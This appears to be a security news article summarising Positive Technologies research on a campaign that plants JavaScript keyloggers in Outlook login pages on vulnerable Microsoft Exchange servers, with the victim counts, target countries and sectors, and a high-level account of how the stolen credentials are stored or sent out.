Unidentified threat actors have been targeting publicly exposed Microsoft Exchange servers by injecting malicious JavaScript keyloggers into Outlook login pages to harvest user credentials, according to new research from Positive Technologies. The campaign has compromised 65 victims across 26 countries worldwide, representing a significant expansion of attacks first documented in May 2024 that initially focused on entities in Africa and the Middle East. The cybersecurity firm identified two distinct keylogger variants embedded in the authentication pages, with some storing collected data in locally accessible files while others immediately transmit stolen credentials to external servers controlled by the attackers.
The attack methodology exploits known vulnerabilities in Microsoft Exchange Server, including the ProxyShell and ProxyLogon vulnerability chains dating back to 2021, as well as older flaws such as CVE-2014-4078 and the Windows SMBv3 remote code execution vulnerability. The malicious JavaScript code intercepts authentication form data and either saves it to server files accessible from external networks or exfiltrates information through sophisticated channels including Telegram bots and DNS tunneling techniques. This approach provides attackers with a significant operational advantage as the locally stored variant generates no suspicious outbound traffic, making detection extremely difficult for security monitoring systems.
Government organizations represent the primary target demographic with 22 compromised servers identified, followed by attacks on IT companies, industrial organizations, and logistics firms. The geographic distribution spans Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey among the most heavily targeted nations. .